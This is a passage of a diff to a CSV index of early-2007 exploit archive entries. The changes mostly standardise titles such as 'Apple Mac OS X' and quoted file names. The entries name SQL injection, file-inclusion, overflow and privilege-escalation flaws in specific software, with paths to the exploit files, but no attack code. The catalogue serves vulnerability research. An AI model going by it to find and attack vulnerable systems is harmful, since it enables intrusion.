Remote File Inclusion",2007-01-07,bd0rk,php,webapps,0 -3098,platforms/osx/dos/3098.html,"OmniWeb 5.5.1 - Javascript alert() Remote Format String (PoC)",2007-01-07,MoAB,osx,dos,0 +3098,platforms/osx/dos/3098.html,"OmniWeb 5.5.1 - JavaScript alert() Remote Format String (PoC)",2007-01-07,MoAB,osx,dos,0 3099,platforms/linux/remote/3099.pm,"Berlios GPSD 2.7 - Remote Format String Exploit (Metasploit)",2007-01-08,Enseirb,linux,remote,2947 3100,platforms/php/webapps/3100.txt,"Magic Photo Storage Website - _config[site_path] File Include",2007-01-08,k1tk4t,php,webapps,0 -3101,platforms/multiple/dos/3101.py,"Opera 9.10 - .jpg Image DHT Marker Heap Corruption Vulnerabilities",2007-01-08,posidron,multiple,dos,0 +3101,platforms/multiple/dos/3101.py,"Opera 9.10 - '.jpg' Image DHT Marker Heap Corruption Vulnerabilities",2007-01-08,posidron,multiple,dos,0 3102,platforms/osx/local/3102.rb,"Application Enhancer (APE) 2.0.2 - Privilege Escalation",2007-01-08,MoAB,osx,local,0 -3103,platforms/php/webapps/3103.php,"@lex GuestBook 4.0.2 - Remote Command Execution Exploit",2007-01-08,DarkFig,php,webapps,0 +3103,platforms/php/webapps/3103.php,"@lex Guestbook 4.0.2 - Remote Command Execution Exploit",2007-01-08,DarkFig,php,webapps,0 3104,platforms/php/webapps/3104.txt,"PPC Search Engine 1.61 - (INC) Multiple Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 3105,platforms/asp/webapps/3105.txt,"MOTIONBORG Web Real Estate 2.1 - SQL Injection",2007-01-09,ajann,asp,webapps,0 3106,platforms/php/webapps/3106.txt,"uniForum 4 - 'wbsearch.aspx' SQL Injection",2007-01-09,ajann,php,webapps,0 -3107,platforms/windows/remote/3107.pm,"FileCOPA FTP Server 1.01 - (LIST) Remote Buffer Overflow Exploit (Metasploit)",2007-01-09,"Jacopo Cervini",windows,remote,21 -3108,platforms/php/webapps/3108.pl,"Axiom Photo/News Gallery 0.8.6 - Remote File Inclusion Exploit",2007-01-09,DeltahackingTEAM,php,webapps,0 -3109,platforms/php/webapps/3109.php,"Wordpress 2.0.6 - wp-trackback.php SQL Injection",2007-01-10,rgod,php,webapps,0 -3110,platforms/osx/dos/3110.rb,"Mac OSX 10.4.8 - Apple Finder DMG Volume Name Memory Corruption (PoC)",2007-01-09,MoAB,osx,dos,0 -3111,platforms/windows/dos/3111.pl,"Microsoft Windows - Explorer (WMF) CreateBrushIndirect Denial of Service",2007-01-13,cyanid-E,windows,dos,0 +3107,platforms/windows/remote/3107.pm,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow Exploit (Metasploit)",2007-01-09,"Jacopo Cervini",windows,remote,21 +3108,platforms/php/webapps/3108.pl,"Axiom Photo/News Gallery 0.8.6 - Remote File Inclusion",2007-01-09,DeltahackingTEAM,php,webapps,0 +3109,platforms/php/webapps/3109.php,"WordPress 2.0.6 - wp-trackback.php SQL Injection",2007-01-10,rgod,php,webapps,0 +3110,platforms/osx/dos/3110.rb,"Apple Mac OS X 10.4.8 - Apple Finder DMG Volume Name Memory Corruption (PoC)",2007-01-09,MoAB,osx,dos,0 +3111,platforms/windows/dos/3111.pl,"Microsoft Windows - Explorer (.WMF) CreateBrushIndirect Denial of Service",2007-01-13,cyanid-E,windows,dos,0 3112,platforms/windows/dos/3112.py,"eIQnetworks Network Security Analyzer - Null Pointer Dereference Exploit",2007-01-10,"Ethan Hunt",windows,dos,0 3113,platforms/php/webapps/3113.txt,"Jshop Server 1.3 - (fieldValidation.php) Remote File Inclusion",2007-01-10,irvian,php,webapps,0 3114,platforms/php/webapps/3114.txt,"Article System 0.1 - (INCLUDE_DIR) Remote File Inclusion",2007-01-11,3l3ctric-Cracker,php,webapps,0 @@ -2794,22 +2795,22 @@ id,file,description,date,author,platform,type,port 3118,platforms/php/webapps/3118.txt,"TLM CMS 1.1 - (i-accueil.php chemin) Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0 3119,platforms/windows/dos/3119.py,"VLC Media Player 0.8.6a - Unspecified Denial of Service",2007-01-12,shinnai,windows,dos,0 3120,platforms/php/webapps/3120.txt,"Mint Haber Sistemi 2.7 - (duyuru.asp id) SQL Injection",2007-01-12,chernobiLe,php,webapps,0 -3121,platforms/php/webapps/3121.txt,"Poplar Gedcom Viewer 2.0 - (common.php) Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0 +3121,platforms/php/webapps/3121.txt,"Poplar Gedcom Viewer 2.0 - 'common.php' Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0 3122,platforms/asp/webapps/3122.pl,"DigiAffiliate 1.4 - (visu_user.asp id) SQL Injection",2007-01-13,ajann,asp,webapps,0 -3123,platforms/php/webapps/3123.htm,"FdWeB Espace Membre 2.01 - (path) Remote File Inclusion Exploit",2007-01-13,ajann,php,webapps,0 -3124,platforms/php/webapps/3124.php,"ThWboard 3.0b2.84-php5 - SQL Injection / Code Execution Exploit",2007-01-14,rgod,php,webapps,0 +3123,platforms/php/webapps/3123.htm,"FdWeB Espace Membre 2.01 - (path) Remote File Inclusion",2007-01-13,ajann,php,webapps,0 +3124,platforms/php/webapps/3124.php,"ThWboard 3.0b2.84-php5 - SQL Injection / Code Execution",2007-01-14,rgod,php,webapps,0 3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure Exploit",2007-01-14,PeTrO,php,webapps,0 -3126,platforms/windows/dos/3126.c,"WFTPD Pro Server 3.25 - SITE ADMN Remote Denial of Service",2007-01-14,Marsu,windows,dos,0 +3126,platforms/windows/dos/3126.c,"WFTPD Pro Server 3.25 - Site ADMN Remote Denial of Service",2007-01-14,Marsu,windows,dos,0 3127,platforms/windows/dos/3127.c,"Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0 3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP - (USER) Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0 -3130,platforms/osx/dos/3130.c,"Mac OSX 10.4.8 - AppleTalk ATPsndrsp() Heap Buffer Overflow (PoC)",2007-01-14,MoAB,osx,dos,0 -3131,platforms/windows/local/3131.c,"Kaspersky Antivirus 6.0 - Privilege Escalation",2007-01-15,MaD,windows,local,0 +3130,platforms/osx/dos/3130.c,"Apple Mac OS X 10.4.8 - AppleTalk ATPsndrsp() Heap Buffer Overflow (PoC)",2007-01-14,MoAB,osx,dos,0 +3131,platforms/windows/local/3131.c,"Kaspersky AntiVirus 6.0 - Privilege Escalation",2007-01-15,MaD,windows,local,0 3132,platforms/windows/remote/3132.pl,"TFTPDWIN 0.4.2 - Remote Buffer Overflow",2007-01-15,"Jacopo Cervini",windows,remote,69 3133,platforms/windows/remote/3133.pl,"Mercur Messaging 2005 - IMAP Remote Buffer Overflow",2007-01-15,"Jacopo Cervini",windows,remote,143 -3134,platforms/php/webapps/3134.php,"KGB 1.9 - (sesskglogadmin.php) Local File Inclusion Exploit",2007-01-15,Kacper,php,webapps,0 +3134,platforms/php/webapps/3134.php,"KGB 1.9 - (sesskglogadmin.php) Local File Inclusion",2007-01-15,Kacper,php,webapps,0 3135,platforms/asp/webapps/3135.txt,"Okul Web Otomasyon Sistemi 4.0.1 - SQL Injection",2007-01-15,"ilker Kandemir",asp,webapps,0 3137,platforms/windows/remote/3137.html,"Microsoft Internet Explorer - VML Remote Buffer Overflow (MS07-004)",2007-01-16,LifeAsaGeek,windows,remote,0 -3138,platforms/windows/dos/3138.pl,"Twilight Webserver 1.3.3.0 - (GET) Remote Denial of Service",2003-07-07,anonymous,windows,dos,0 +3138,platforms/windows/dos/3138.pl,"Twilight WebServer 1.3.3.0 - (GET) Remote Denial of Service",2003-07-07,anonymous,windows,dos,0 3139,platforms/osx/dos/3139.rb,"Colloquy 2.1.3545 - (INVITE) Format String Denial of Service",2007-01-17,MoAB,osx,dos,0 3140,platforms/windows/remote/3140.pl,"Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow Exploit",2007-01-17,UmZ,windows,remote,21 3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 - (email.php id Variable) SQL Injection",2007-01-17,SlimTim10,php,webapps,0 @@ -2818,13 +2819,13 @@ id,file,description,date,author,platform,type,port 3144,platforms/php/webapps/3144.pl,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (2)",2007-01-17,trew,php,webapps,0 3145,platforms/php/webapps/3145.txt,"PHPMyphorum 1.5a - (mep/frame.php) Remote File Inclusion",2007-01-17,v1per-haCker,php,webapps,0 3146,platforms/php/webapps/3146.pl,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (3)",2007-01-17,666,php,webapps,0 -3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 - (frontpage.php) Remote File Inclusion",2007-01-17,GoLd_M,php,webapps,0 +3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 - (FrontPage.php) Remote File Inclusion",2007-01-17,GoLd_M,php,webapps,0 3148,platforms/windows/remote/3148.pl,"Microsoft Internet Explorer - VML Download and Execute Exploit (MS07-004)",2007-01-17,pang0,windows,remote,0 3149,platforms/windows/local/3149.cpp,"Microsoft Help Workshop 4.03.0002 - '.cnt' Buffer Overflow",2007-01-17,porkythepig,windows,local,0 3150,platforms/php/webapps/3150.txt,"Oreon 1.2.3 RC4 - (lang/index.php) Remote File Inclusion",2007-01-17,3l3ctric-Cracker,php,webapps,0 -3151,platforms/osx/dos/3151.rb,"Mac OSX 10.4.8 - SLP Daemon Service Registration Buffer Overflow (PoC)",2007-01-18,MoAB,osx,dos,0 +3151,platforms/osx/dos/3151.rb,"Apple Mac OS X 10.4.8 - SLP Daemon Service Registration Buffer Overflow (PoC)",2007-01-18,MoAB,osx,dos,0 3152,platforms/php/webapps/3152.txt,"ComVironment 4.0 - (grab_globals.lib.php) Remote File Inclusion",2007-01-18,GoLd_M,php,webapps,0 -3153,platforms/php/webapps/3153.php,"phpBP RC3 - (2.204) (SQL Injection / cmd) Remote Code Execution Exploit",2007-01-18,Kacper,php,webapps,0 +3153,platforms/php/webapps/3153.php,"phpBP RC3 - (2.204) (SQL Injection / cmd) Remote Code Execution",2007-01-18,Kacper,php,webapps,0 3154,platforms/linux/local/3154.c,"GNU/Linux mbse-bbs 0.70.0 - Local Buffer Overflow",2007-01-18,prdelka,linux,local,0 3155,platforms/windows/dos/3155.html,"BrowseDialog Class (ccrpbds6.dll) Internet Explorer 7 - Denial of Service",2007-01-18,shinnai,windows,dos,0 3156,platforms/osx/local/3156.rb,"Rumpus 5.1 - Privilege Escalation / Remote FTP LIST (PoC)",2007-01-19,MoAB,osx,local,0 @@ -2835,24 +2836,24 @@ id,file,description,date,author,platform,type,port 3161,platforms/php/webapps/3161.txt,"PHPSherpa - (include/config.inc.php) Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 3162,platforms/php/webapps/3162.txt,"Bradabra 2.0.5 - (include/includes.php) Remote File Inclusion",2007-01-20,GoLd_M,php,webapps,0 3163,platforms/php/webapps/3163.txt,"Neon Labs Website 3.2 - (nl.php g_strRootDir) Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 -3164,platforms/php/webapps/3164.pl,"PHPIndexPage 1.0.1 - (config.php) Remote File Inclusion Exploit",2007-01-20,DeltahackingTEAM,php,webapps,0 +3164,platforms/php/webapps/3164.pl,"PHPIndexPage 1.0.1 - 'config.php' Remote File Inclusion",2007-01-20,DeltahackingTEAM,php,webapps,0 3165,platforms/php/webapps/3165.txt,"MySpeach 2.1b - (up.php) Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 3166,platforms/osx/dos/3166.html,"Apple iChat 3.1.6 441 - aim:// URL Handler Format String (PoC)",2007-01-21,MoAB,osx,dos,0 -3167,platforms/osx/dos/3167.c,"Mac OSX 10.4.x Kernel - shared_region_map_file_np() Memory Corruption",2007-01-21,"Adriano Lima",osx,dos,0 -3168,platforms/windows/remote/3168.java,"Sun Microsystems Java - .gif File Parsing Memory Corruption Exploit",2007-01-21,luoluo,windows,remote,0 +3167,platforms/osx/dos/3167.c,"Apple Mac OS X 10.4.x - Kernel shared_region_map_file_np() Memory Corruption",2007-01-21,"Adriano Lima",osx,dos,0 +3168,platforms/windows/remote/3168.java,"Sun Microsystems Java - '.GIF' File Parsing Memory Corruption Exploit",2007-01-21,luoluo,windows,remote,0 3169,platforms/php/webapps/3169.txt,"WebChat 0.77 - (defines.php WEBCHATPATH) Remote File Inclusion",2007-01-21,v1per-haCker,php,webapps,0 3170,platforms/windows/remote/3170.pm,"3Com TFTP Service 2.0.1 - Remote Buffer Overflow (Metasploit)",2007-01-21,Enseirb,windows,remote,69 -3171,platforms/php/webapps/3171.pl,"Mafia Scum Tools 2.0.0 - (index.php gen) Remote File Inclusion Exploit",2007-01-21,DeltahackingTEAM,php,webapps,0 -3172,platforms/php/webapps/3172.php,"webSPELL 4.01.02 - (gallery.php) Blind SQL Injection",2007-01-21,r00t,php,webapps,0 -3173,platforms/osx/local/3173.rb,"Mac OSX 10.4.8 - System Preferences Privilege Escalation",2007-01-21,MoAB,osx,local,0 +3171,platforms/php/webapps/3171.pl,"Mafia Scum Tools 2.0.0 - (index.php gen) Remote File Inclusion",2007-01-21,DeltahackingTEAM,php,webapps,0 +3172,platforms/php/webapps/3172.php,"webSPELL 4.01.02 - 'gallery.php' Blind SQL Injection",2007-01-21,r00t,php,webapps,0 +3173,platforms/osx/local/3173.rb,"Apple Mac OS X 10.4.8 - System Preferences Privilege Escalation",2007-01-21,MoAB,osx,local,0 3174,platforms/php/webapps/3174.txt,"Upload Service 1.0 - (top.php maindir) Remote File Inclusion",2007-01-21,y3dips,php,webapps,0 -3175,platforms/php/webapps/3175.pl,"VisoHotlink 1.01 - functions.visohotlink.php Remote File Inclusion Exploit",2007-01-22,bd0rk,php,webapps,0 +3175,platforms/php/webapps/3175.pl,"VisoHotlink 1.01 - functions.visohotlink.php Remote File Inclusion",2007-01-22,bd0rk,php,webapps,0 3176,platforms/windows/local/3176.cpp,"Microsoft Visual C++ - '.RC Resource Files' Local Buffer Overflow",2007-01-22,porkythepig,windows,local,0 3177,platforms/multiple/local/3177.txt,"Oracle 10g - SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE PL / SQL Injection",2007-01-23,"Joxean Koret",multiple,local,0 3178,platforms/multiple/local/3178.txt,"Oracle 10g - SYS.KUPW$WORKER.MAIN PL / SQL Injection",2007-01-23,"Joxean Koret",multiple,local,0 3179,platforms/multiple/local/3179.txt,"Oracle 10g - SYS.KUPV$FT.ATTACH_JOB PL / SQL Injection",2007-01-23,"Joxean Koret",multiple,local,0 -3180,platforms/php/webapps/3180.pl,"Vote-Pro 4.0 - (poll_frame.php poll_id) Remote Code Execution Exploit",2007-01-23,r0ut3r,php,webapps,0 -3181,platforms/osx/local/3181.rb,"Mac OSX 10.4.8 - (UserNotificationCenter) Privilege Escalation",2007-01-23,MoAB,osx,local,0 +3180,platforms/php/webapps/3180.pl,"Vote-Pro 4.0 - (poll_frame.php poll_id) Remote Code Execution",2007-01-23,r0ut3r,php,webapps,0 +3181,platforms/osx/local/3181.rb,"Apple Mac OS X 10.4.8 - 'UserNotificationCenter' Privilege Escalation",2007-01-23,MoAB,osx,local,0 3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - (HTTP 404 Object not found) Denial of Service",2007-01-23,shinnai,windows,dos,0 3183,platforms/php/webapps/3183.txt,"BBClone 0.31 - (selectlang.php) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 3184,platforms/php/webapps/3184.txt,"phpXD 0.3 - (path) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 @@ -2860,9 +2861,9 @@ id,file,description,date,author,platform,type,port 3186,platforms/asp/webapps/3186.txt,"ASP EDGE 1.2b - (user.asp) SQL Injection",2007-01-24,ajann,asp,webapps,0 3187,platforms/asp/webapps/3187.txt,"ASP NEWS 3.0 - (news_detail.asp) SQL Injection",2007-01-24,ajann,asp,webapps,0 3189,platforms/hardware/remote/3189.sh,"PA168 Chipset IP Phones - Weak Session Management Exploit",2007-01-24,"Adrian ""pagvac"" Pastor",hardware,remote,0 -3190,platforms/windows/dos/3190.py,"Microsoft Windows - Explorer (AVI) Unspecified Denial of Service",2007-01-24,shinnai,windows,dos,0 +3190,platforms/windows/dos/3190.py,"Microsoft Windows - Explorer (.AVI) Unspecified Denial of Service",2007-01-24,shinnai,windows,dos,0 3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 - (MODULES_DIR) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0 -3192,platforms/php/webapps/3192.pl,"Xero Portal - (phpbb_root_path) Remote File Inclusion",2007-01-24,"Mehmet Ince",php,webapps,0 +3192,platforms/php/webapps/3192.pl,"Xero Portal - 'phpbb_root_path' Remote File Inclusion",2007-01-24,"Mehmet Ince",php,webapps,0 3193,platforms/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record Denial of Service PoC (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0 3194,platforms/asp/webapps/3194.txt,"makit Newsposter Script 3.0 - SQL Injection",2007-01-25,ajann,asp,webapps,0 3195,platforms/asp/webapps/3195.txt,"GPS CMS 1.2 - (print.asp) SQL Injection",2007-01-25,ajann,asp,webapps,0 @@ -2876,42 +2877,42 @@ id,file,description,date,author,platform,type,port 3204,platforms/windows/dos/3204.c,"Citrix Metaframe Presentation Server Print Provider - Buffer Overflow (PoC)",2007-01-26,"Andres Tarasco",windows,dos,0 3205,platforms/php/webapps/3205.txt,"nsGalPHP - (includes/config.inc.php racineTBS) Remote File Inclusion",2007-01-27,S.W.A.T.,php,webapps,0 3206,platforms/php/webapps/3206.txt,"ACGVclick 0.2.0 - (path) Remote File Inclusion",2007-01-27,ajann,php,webapps,0 -3207,platforms/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Inclusion Exploit",2007-01-27,MackRulZ,php,webapps,0 +3207,platforms/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Inclusion",2007-01-27,MackRulZ,php,webapps,0 3208,platforms/php/webapps/3208.txt,"ACGVannu 1.3 - (index2.php) Remote User Pass Change",2007-01-27,ajann,php,webapps,0 3209,platforms/php/webapps/3209.txt,"Xt-Stats 2.4.0.b3 (server_base_dir) - Remote File Inclusion",2007-01-27,"ThE dE@Th",php,webapps,0 -3210,platforms/asp/webapps/3210.txt,"chernobiLe Portal 1.0 - (default.asp) SQL Injection",2007-01-27,ajann,asp,webapps,0 +3210,platforms/asp/webapps/3210.txt,"chernobiLe Portal 1.0 - 'default.asp' SQL Injection",2007-01-27,ajann,asp,webapps,0 3211,platforms/windows/remote/3211.py,"CA BrightStor ARCserve - (msgeng.exe) Remote Heap Overflow (1)",2007-01-27,"Winny Thomas",windows,remote,6503 3212,platforms/php/webapps/3212.txt,"PHPMyReports 3.0.11 - (lib_head.php) Remote File Inclusion",2007-01-27,GoLd_M,php,webapps,0 3213,platforms/linux/local/3213.c,"Trend Micro VirusWall 3.81 - (vscan/VSAPI) Local Buffer Overflow",2007-01-28,"Sebastian Wolfgarten",linux,local,0 -3214,platforms/php/webapps/3214.pl,"EclipseBB 0.5.0 Lite - (phpbb_root_path) Remote File Inclusion Exploit",2007-01-28,"Mehmet Ince",php,webapps,0 -3215,platforms/php/webapps/3215.pl,"Foro Domus 2.10 - (phpbb_root_path) Remote File Inclusion Exploit",2007-01-28,"Mehmet Ince",php,webapps,0 +3214,platforms/php/webapps/3214.pl,"EclipseBB 0.5.0 Lite - 'phpbb_root_path' Remote File Inclusion",2007-01-28,"Mehmet Ince",php,webapps,0 +3215,platforms/php/webapps/3215.pl,"Foro Domus 2.10 - 'phpbb_root_path' Remote File Inclusion",2007-01-28,"Mehmet Ince",php,webapps,0 3216,platforms/php/webapps/3216.txt,"xNews 1.3 - (xNews.php) SQL Injection",2007-01-28,ajann,php,webapps,0 -3217,platforms/php/webapps/3217.txt,"PHP Generic library & framework - (include_path) Remote File Inclusion",2007-01-28,"Mehmet Ince",php,webapps,0 +3217,platforms/php/webapps/3217.txt,"PHP Generic library & Framework - 'INCLUDE_PATH' Remote File Inclusion",2007-01-28,"Mehmet Ince",php,webapps,0 3218,platforms/windows/remote/3218.pl,"CA BrightStor ARCserve - (msgeng.exe) Remote Heap Overflow (2)",2007-01-28,"Jacopo Cervini",windows,remote,6503 -3219,platforms/osx/local/3219.rb,"Mac OSX 10.4.8 (8L2127) - crashdump Privilege Escalation",2007-01-29,MoAB,osx,local,0 +3219,platforms/osx/local/3219.rb,"Apple Mac OS X 10.4.8 (8L2127) - crashdump Privilege Escalation",2007-01-29,MoAB,osx,local,0 3220,platforms/windows/local/3220.c,"Multiple Printer Providers (spooler service) - Privilege Escalation",2007-01-29,"Andres Tarasco",windows,local,0 3221,platforms/php/webapps/3221.php,"GuppY 4.5.16 - Remote Commands Execution Exploit",2007-01-29,rgod,php,webapps,0 3222,platforms/php/webapps/3222.txt,"Webfwlog 0.92 - (debug.php) Remote File Disclosure",2007-01-29,GoLd_M,php,webapps,0 3223,platforms/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Post-Attack Database Resurrection Denial of Service",2007-01-29,"Ralf S. Engelschall",cgi,dos,0 3224,platforms/windows/dos/3224.c,"Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption",2007-01-29,"Breno Silva Pinto",windows,dos,0 -3225,platforms/php/webapps/3225.pl,"Galeria Zdjec 3.0 - (zd_numer.php) Local File Inclusion Exploit",2007-01-30,ajann,php,webapps,0 +3225,platforms/php/webapps/3225.pl,"Galeria Zdjec 3.0 - (zd_numer.php) Local File Inclusion",2007-01-30,ajann,php,webapps,0 3226,platforms/php/webapps/3226.txt,"PHPFootball 1.6 - (show.php) Remote Database Disclosure",2007-01-30,ajann,php,webapps,0 3227,platforms/php/webapps/3227.txt,"CascadianFAQ 4.1 - 'index.php' SQL Injection",2007-01-30,ajann,php,webapps,0 3228,platforms/php/webapps/3228.txt,"MyNews 4.2.2 - (themefunc.php) Remote File Inclusion",2007-01-30,GoLd_M,php,webapps,0 -3229,platforms/windows/dos/3229.py,"Dev-C++ 4.9.9.2 - .CPP File Parsing Local Stack Overflow (PoC)",2007-01-30,shinnai,windows,dos,0 +3229,platforms/windows/dos/3229.py,"Dev-C++ 4.9.9.2 - '.CPP' File Parsing Local Stack Overflow (PoC)",2007-01-30,shinnai,windows,dos,0 3230,platforms/osx/dos/3230.rb,"Apple iChat Bonjour 3.1.6.441 - Multiple Denial of Service",2007-01-30,MoAB,osx,dos,0 -3231,platforms/php/webapps/3231.txt,"PHPBB2 MODificat 0.2.0 - (functions.php) Remote File Inclusion",2007-01-30,"Mehmet Ince",php,webapps,0 +3231,platforms/php/webapps/3231.txt,"PHPBB2 MODificat 0.2.0 - 'functions.php' Remote File Inclusion",2007-01-30,"Mehmet Ince",php,webapps,0 3232,platforms/php/webapps/3232.txt,"Michelles L2J Dropcalc 4 - SQL Injection",2007-01-31,Codebreak,php,webapps,0 3233,platforms/asp/webapps/3233.txt,"Fullaspsite Asp Hosting Sitesi - (tr) SQL Injection",2007-01-31,cl24zy,asp,webapps,0 3234,platforms/php/webapps/3234.txt,"ExoPHPDesk 1.2.1 - (faq.php) SQL Injection",2007-01-31,ajann,php,webapps,0 -3235,platforms/php/webapps/3235.txt,"phpBB Tweaked 3 - (phpBB_root_path) Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 -3236,platforms/php/webapps/3236.txt,"Hailboards 1.2.0 - (phpbb_root_path) Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 +3235,platforms/php/webapps/3235.txt,"phpBB Tweaked 3 - 'phpbb_root_path' Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 +3236,platforms/php/webapps/3236.txt,"Hailboards 1.2.0 - 'phpbb_root_path' Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 3237,platforms/php/webapps/3237.txt,"Cadre PHP Framework - Remote File Inclusion",2007-01-31,y3dips,php,webapps,0 3238,platforms/php/webapps/3238.txt,"PHPMyRing 4.1.3b - (fichier) Remote File Inclusion",2007-01-31,ajann,php,webapps,0 3239,platforms/php/webapps/3239.htm,"Extcalendar 2 - 'profile.php' Remote User Pass Change Exploit",2007-01-31,ajann,php,webapps,0 3240,platforms/php/webapps/3240.txt,"JV2 Folder Gallery 3.0 - Remote File Inclusion",2007-01-31,"ThE dE@Th",php,webapps,0 3241,platforms/asp/webapps/3241.txt,"Hunkaray Duyuru Scripti - (tr) SQL Injection",2007-01-31,cl24zy,asp,webapps,0 -3242,platforms/php/webapps/3242.txt,"Omegaboard 1.0beta4 - (functions.php) Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 +3242,platforms/php/webapps/3242.txt,"Omegaboard 1.0beta4 - 'functions.php' Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 3243,platforms/php/webapps/3243.txt,"Cerulean Portal System 0.7b - Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 3244,platforms/windows/remote/3244.py,"CA BrightStor ARCserve - 'lgserver.exe' Remote Stack Overflow",2007-02-01,"Winny Thomas",windows,remote,1900 3245,platforms/php/webapps/3245.txt,"SIPS 0.3.1 - (box.inc.php) Remote File Inclusion",2007-02-01,ajann,php,webapps,0 @@ -2924,12 +2925,12 @@ id,file,description,date,author,platform,type,port 3252,platforms/php/webapps/3252.txt,"EQdkp 1.3.1 - (Referer Spoof) Remote Database Backup",2007-02-02,Eight10,php,webapps,0 3253,platforms/php/webapps/3253.txt,"Flipper Poll 1.1.0 - (poll.php root_path) Remote File Inclusion",2007-02-02,"Mehmet Ince",php,webapps,0 3254,platforms/windows/dos/3254.py,"Remotesoft .NET Explorer 2.0.1 - Local Stack Overflow (PoC)",2007-02-02,shinnai,windows,dos,0 -3255,platforms/php/webapps/3255.php,"F3Site 2.1 - Remote Code Execution Exploit",2007-02-02,Kacper,php,webapps,0 +3255,platforms/php/webapps/3255.php,"F3Site 2.1 - Remote Code Execution",2007-02-02,Kacper,php,webapps,0 3256,platforms/php/webapps/3256.txt,"dB Masters Curium CMS 1.03 - (c_id) SQL Injection",2007-02-02,ajann,php,webapps,0 3257,platforms/osx/dos/3257.php,"Chicken of the VNC 2.0 - (NULL-pointer) Remote Denial of Service",2007-02-02,poplix,osx,dos,0 -3258,platforms/php/webapps/3258.txt,"phpBB ezBoard Converter 0.2 - (ezconvert_dir) Remote File Inclusion Exploit",2007-02-02,"Mehmet Ince",php,webapps,0 -3259,platforms/php/webapps/3259.pl,"phpBB++ Build 100 - (phpBB_root_path) Remote File Inclusion Exploit",2007-02-02,"Mehmet Ince",php,webapps,0 -3260,platforms/windows/local/3260.txt,"Microsoft Word 2000 - Unspecified Code Execution Exploit",2007-02-03,xCuter,windows,local,0 +3258,platforms/php/webapps/3258.txt,"phpBB ezBoard Converter 0.2 - (ezconvert_dir) Remote File Inclusion",2007-02-02,"Mehmet Ince",php,webapps,0 +3259,platforms/php/webapps/3259.pl,"phpBB++ Build 100 - 'phpbb_root_path' Remote File Inclusion",2007-02-02,"Mehmet Ince",php,webapps,0 +3260,platforms/windows/local/3260.txt,"Microsoft Word 2000 - Unspecified Code Execution",2007-02-03,xCuter,windows,local,0 3261,platforms/php/webapps/3261.txt,"Photo Galerie Standard 1.1 - (view.php) SQL Injection",2007-02-03,ajann,php,webapps,0 3262,platforms/php/webapps/3262.php,"Woltlab Burning Board Lite 1.0.2pl3e - (pms.php) SQL Injection",2007-02-03,rgod,php,webapps,0 3263,platforms/php/webapps/3263.txt,"KDPics 1.11 - (exif.php lib_path) Remote File Inclusion",2007-02-03,AsTrex,php,webapps,0 @@ -2939,8 +2940,8 @@ id,file,description,date,author,platform,type,port 3267,platforms/php/webapps/3267.txt,"Geeklog 2 - 'BaseView.php' Remote File Inclusion",2007-02-05,GoLd_M,php,webapps,0 3268,platforms/php/webapps/3268.txt,"SMA-DB 0.3.9 - (settings.php) Remote File Inclusion",2007-02-05,"ThE dE@Th",php,webapps,0 3269,platforms/multiple/remote/3269.pl,"Oracle 9i/10g - DBMS_EXPORT_EXTENSION SQL Injection",2007-02-05,bunker,multiple,remote,0 -3270,platforms/php/webapps/3270.pl,"Categories hierarchy phpBB Mod 2.1.2 - (phpBB_root_path) Remote File Inclusion Exploit",2007-02-05,"Mehmet Ince",php,webapps,0 -3271,platforms/php/webapps/3271.php,"GGCMS 1.1.0 RC1 - Remote Code Execution Exploit",2007-02-05,Kacper,php,webapps,0 +3270,platforms/php/webapps/3270.pl,"Categories hierarchy phpBB Mod 2.1.2 - 'phpbb_root_path' Remote File Inclusion",2007-02-05,"Mehmet Ince",php,webapps,0 +3271,platforms/php/webapps/3271.php,"GGCMS 1.1.0 RC1 - Remote Code Execution",2007-02-05,Kacper,php,webapps,0 3272,platforms/windows/dos/3272.html,"Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference Exploit",2007-02-05,AmesianX,windows,dos,0 3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - (ps) Information Leak Exploit",2007-02-06,bunker,tru64,local,0 3274,platforms/windows/remote/3274.txt,"MySQL 4.x/5.0 (Windows) - User-Defined Function (UDF) Command Execution Exploit",2007-02-06,"Marco Ivaldi",windows,remote,3306 @@ -2948,15 +2949,15 @@ id,file,description,date,author,platform,type,port 3276,platforms/windows/dos/3276.cpp,"FlashFXP 3.4.0 build 1145 - 